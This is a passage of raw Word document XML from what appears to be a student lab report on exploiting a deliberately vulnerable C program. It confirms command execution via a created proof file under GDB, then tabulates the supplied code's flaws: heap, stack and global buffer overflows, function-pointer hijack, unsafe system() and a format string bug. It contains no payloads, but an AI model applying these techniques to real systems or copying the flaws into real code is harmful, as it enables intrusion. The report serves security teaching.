        <w:t xml:space="preserve"> proof of command execution. Before the run, /cygdrive/c/hack_success.txt was removed. After execution, shell ls -la /cygdrive/c/hack_success.txt showed a newly created file with a current timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FB35A9" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The assignment is demonstrated within GDB, where the lab environment provides repeatable stack behavior across runs. The exploit was therefore developed and verified in the same environment used for the live demonstration, allowing the report's observations to be reproduced directly during grading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50467188" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRPr="00F339BF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F339BF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>8. Other Vulnerabilities Present in the Supplied Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397E3FC7" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The supplied vulnerable programs contain several distinct vulnerability classes, each exposed through a different case in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>main(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>). The exploit developed in this report uses case 2, but the same source also illustrates heap corruption, global buffer overflow, indirect control flow through a function pointer, uncontrolled recursion, and a format string vulnerability in VulnerableCode_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1.c.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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23"/>
        <w:gridCol w:w="2333"/>
        <w:gridCol w:w="4344"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A57EE" w14:paraId="790192E6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="3B61992C" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="2A3E0BB2" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="295375EB" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Vulnerability class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="01DF9270" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Why it matters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A57EE" w14:paraId="6890EE6F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C6D74F2" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E2C4E58" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>SmashHeap(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24C6450F" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Heap buffer overflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6554280A" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">malloc(24*sizeof(int)) is filled by an unbounded </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>read(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>) loop; overflow corrupts adjacent heap data/allocator metadata rather than a stack frame.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A57EE" w14:paraId="776ADBD7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B17FA42" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01E878F7" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>VulnerableLocalData(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E755E0B" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Stack buffer overflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07A59C53" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploited in this report: overflows </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>BufOve[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>14], then the saved EBP and return address of the enclosing frame.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A57EE" w14:paraId="788F5301" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5980B014" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38EFDB8A" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>RecursivePrefixLocal(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64C602AA" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Same as case 2, plus recursion risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B61232E" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Recurses i</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> times before falling through to </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>VulnerableLocalData(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">); </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>uncontrolled i</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> could also exhaust the stack independently of the overflow.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A57EE" w14:paraId="2A7B28E0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D704F84" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48A7420F" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>AttackGlobal(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="539E21C0" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Global</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>/.bss</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> buffer overflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74819698" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>GlobalBuf[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">42] filled unbounded; sits adjacent to the FuncPtr function pointer </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>in .bss</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, so a large enough overflow could corrupt FuncPtr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A57EE" w14:paraId="20F1853F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51DBE354" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BACF211" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ArcInjection(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34CF6D3D" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Unsafe </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>system(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>) on a mutable string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="149E88C4" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Harmless alone (only runs the hardcoded default Command), but dangerous the moment another bug can influence R's contents first.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A57EE" w14:paraId="0025FDAF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C9184A5" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="259AA814" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>FuncPtr(...)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="392EBDBD" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Indirect call through a corruptible pointer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5131D786" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Calling through a global function pointer is a control-flow hijack risk if that pointer can ever be overwritten (see case 4).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A57EE" w14:paraId="32A890ED" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C81D96C" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C7EDC94" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>RecursivePrefixGlobal(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19E0E18D" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Same as case 4, plus recursion risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63399225" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Recursion wrapper around </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>AttackGlobal(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>), analogous to case 3's relationship to case 2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A57EE" w14:paraId="5B4F33A7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07CC94C4" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>8*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E73CD50" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>PrintfVulnerability(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B98530C" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Format string vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DB6DD29" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>printf(F) instead of printf("%s</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>",F</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>); attacker-controlled format specifiers allow arbitrary memory read (%x/%s) or write (%n). *Present only in VulnerableCode_1.c, not in the _2.c target used for this exploit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="087D6BA2" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="002A57EE">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E96D0C9" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Several cases are especially relevant when comparing how control flow can be influenced:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD48BEF" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cases 3 and 7 eventually reach the same vulnerable functions used by cases 2 and 4, but they introduce recursion before doing so. This creates an additional failure mode because excessive recursion </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>can exhaust</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> stack space before the underlying buffer overflow is reached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17090C4B" w14:textId="77777777" w:rsidR="002A57EE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Case 4 writes beyond </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>GlobalBuf[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">42] in global storage. The source also defines FuncPtr in the same general region of program data. If the final compiler and linker layout place those objects within </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>overwrite</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> range, a sufficiently large global overflow could corrupt FuncPtr. Case 6 later performs an indirect call through that pointer, creating a control flow target distinct from the saved return address used in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the case</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
